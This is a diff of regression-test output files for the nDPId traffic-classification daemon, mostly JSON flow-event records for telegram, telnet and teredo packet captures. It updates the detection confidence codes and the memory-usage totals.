+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779607374,"flow_last_seen":1588779607388,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":52118,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}} 00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1588779603292,"flow_last_seen":1588779643386,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip6","src_ip":"fe80::18a0:a412:8935:c01b","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779645381,"flow_last_seen":1588779647380,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":50698,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779650651,"flow_last_seen":1588779650681,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":58615,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1588779629079,"flow_last_seen":1588779637572,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":54595,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779645381,"flow_last_seen":1588779647380,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":50698,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779650651,"flow_last_seen":1588779650681,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":58615,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1588779629079,"flow_last_seen":1588779637572,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":54595,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"}} 00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":301,"flow_first_seen":1588779617174,"flow_last_seen":1588779629315,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":272,"flow_tot_l4_payload_len":59552,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.52","src_port":23174,"dst_port":31480,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1588779634762,"flow_last_seen":1588779634795,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2728,"flow_avg_l4_payload_len":909,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"216.58.205.68","src_port":61974,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":120,"flow_first_seen":1588779596708,"flow_last_seen":1588779655298,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":19803,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip6","src_ip":"fe80::4ba:91a:7817:e318","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1588779634762,"flow_last_seen":1588779634795,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2728,"flow_avg_l4_payload_len":909,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"216.58.205.68","src_port":61974,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":120,"flow_first_seen":1588779596708,"flow_last_seen":1588779655298,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":19803,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip6","src_ip":"fe80::4ba:91a:7817:e318","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 00570{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","packets-captured":1566,"packets-processed":1566,"total-skipped-flows":0,"total-l4-payload-len":268533,"total-not-detected-flows":2,"total-guessed-flows":0,"total-detected-flows":46,"total-detection-updates":13,"total-updates":0,"current-active-flows":0,"total-active-flows":48,"total-idle-flows":48,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":279,"global_ts_msec":1588779655298} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1566/1566 @@ -285,9 +285,9 @@ ~~ total active/idle flows...: 48/48 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5964316 bytes -~~ total memory freed........: 5964316 bytes -~~ total allocations/frees...: 119854/119854 +~~ total memory allocated....: 6097950 bytes +~~ total memory freed........: 6097950 bytes +~~ total allocations/frees...: 122616/122616 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 2278 chars diff --git a/test/results/telnet.pcap.out b/test/results/telnet.pcap.out index b281396f1..2bc8bfd7c 100644 --- a/test/results/telnet.pcap.out +++ b/test/results/telnet.pcap.out @@ -4,11 +4,11 @@ 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":943755158387,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":943755158387,"pkt":"AADAn6CXAKDMO7\/6CABFEAA8RjxAAEAGcxzAqAACwKgAAQYOABeZxaDsAAAAAKACfXjgowAAAgQFtAQCCAoAnCckAAAAAAEDAwA="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":943755158389,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":943755158389,"pkt":"AKDMO7\/6AADAn6CXCABFAAA8UeMAAEAGp4XAqAABwKgAAgAXBg4X8WM9mcWg7aASQ+D7twAAAgQFqAEDAwABAQgKACWmLACcJyQ="} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":943755158389,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":943755158389,"pkt":"AADAn6CXAKDMO7\/6CABFEAA0Rj1AAEAGcyPAqAACwKgAAQYOABeZxaDtF\/FjPoAQfXjt1wAAAQEICgCcJyQAJaYs"} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":943755158387,"flow_last_seen":943755158537,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":943755158537,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"","password":""}} -00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":943755158387,"flow_last_seen":943755159705,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":943755159705,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"","password":""}} -00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":31,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":943755158387,"flow_last_seen":943755160949,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":342,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":943755160949,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"fake","password":""}} -00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":32,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":943755158387,"flow_last_seen":943755160950,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":342,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":943755160950,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"fake","password":""}} -00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":92,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":92,"flow_first_seen":943755158387,"flow_last_seen":943755197958,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":488,"flow_tot_l4_payload_len":1660,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":943755197958,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":943755158387,"flow_last_seen":943755158537,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":943755158537,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"","password":""}} +00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":943755158387,"flow_last_seen":943755159705,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":943755159705,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"","password":""}} +00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":31,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":943755158387,"flow_last_seen":943755160949,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":342,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":943755160949,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"fake","password":""}} +00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":32,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":943755158387,"flow_last_seen":943755160950,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":342,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":943755160950,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"fake","password":""}} +00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":92,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":92,"flow_first_seen":943755158387,"flow_last_seen":943755197958,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":488,"flow_tot_l4_payload_len":1660,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":943755197958,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"}} 00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":92,"source":"telnet.pcap","alias":"nDPId-test","packets-captured":92,"packets-processed":92,"total-skipped-flows":0,"total-l4-payload-len":1660,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":3,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":12,"global_ts_msec":943755197958} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 92/92 @@ -18,9 +18,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5874159 bytes -~~ total memory freed........: 5874159 bytes -~~ total allocations/frees...: 118207/118207 +~~ total memory allocated....: 6007793 bytes +~~ total memory freed........: 6007793 bytes +~~ total allocations/frees...: 120969/120969 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 810 chars diff --git a/test/results/teredo.pcap.out b/test/results/teredo.pcap.out index bc77c54c8..978db8de8 100644 --- a/test/results/teredo.pcap.out +++ b/test/results/teredo.pcap.out @@ -2,31 +2,31 @@ 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"teredo.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1438853615305} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"teredo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853615305,"flow_last_seen":1438853615305,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1438853615305,"l3_proto":"ip4","src_ip":"10.112.16.106","dst_ip":"194.136.28.76","src_port":52513,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"teredo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1438853615305,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1438853615305,"pkt":"bEFqjICJABsXAAEVCABFAABZWboAAH4R6SsKcBBqwogcTM0hDdgARX2HAAEAALEbP+pGqa\/pAGAAAAAACDr\/\/oAAAAAAAAAAAP\/\/\/\/\/\/\/v8CAAAAAAAAAAAAAAAAAAKFAH04AAAAAA=="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"teredo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853615305,"flow_last_seen":1438853615305,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1438853615305,"l3_proto":"ip4","src_ip":"10.112.16.106","dst_ip":"194.136.28.76","src_port":52513,"dst_port":3544,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"teredo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853615305,"flow_last_seen":1438853615305,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1438853615305,"l3_proto":"ip4","src_ip":"10.112.16.106","dst_ip":"194.136.28.76","src_port":52513,"dst_port":3544,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} 00602{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"teredo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1438853615358,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":151,"pkt_l4_len":117,"thread_ts_msec":1438853615358,"pkt":"ABsXAAEVbEFqjICJCABFAACJMb4AAHIRHPjCiBxMCnAQag3YzSEAdV9uAAEAALEbP+pGqa\/pAAAAMt5G+T9GYAAAAAAwOv\/+gAAAAAAAAIAA8ic9d+Oz\/oAAAAAAAAAAAP\/\/\/\/\/\/\/oYAZJ0AAAAAAAA6mAAAB9ADBEBA\/\/\/\/\/\/\/\/\/\/8AAAAAIAEAAMKIHEz\/AAAAACABAA=="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"teredo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853619792,"flow_last_seen":1438853619792,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1438853619792,"l3_proto":"ip4","src_ip":"10.112.16.89","dst_ip":"194.136.28.76","src_port":60381,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"teredo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1438853619792,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1438853619792,"pkt":"bEFqjICJABsXAAEVCABFAABZKFgAAH4RGp8KcBBZwogcTOvdDdgARWZ6AAEAAJXRHBBSCtwOAGAAAAAACDr\/\/oAAAAAAAAAAAP\/\/\/\/\/\/\/v8CAAAAAAAAAAAAAAAAAAKFAH04AAAAAA=="} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"teredo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853619792,"flow_last_seen":1438853619792,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1438853619792,"l3_proto":"ip4","src_ip":"10.112.16.89","dst_ip":"194.136.28.76","src_port":60381,"dst_port":3544,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"teredo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853619792,"flow_last_seen":1438853619792,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1438853619792,"l3_proto":"ip4","src_ip":"10.112.16.89","dst_ip":"194.136.28.76","src_port":60381,"dst_port":3544,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} 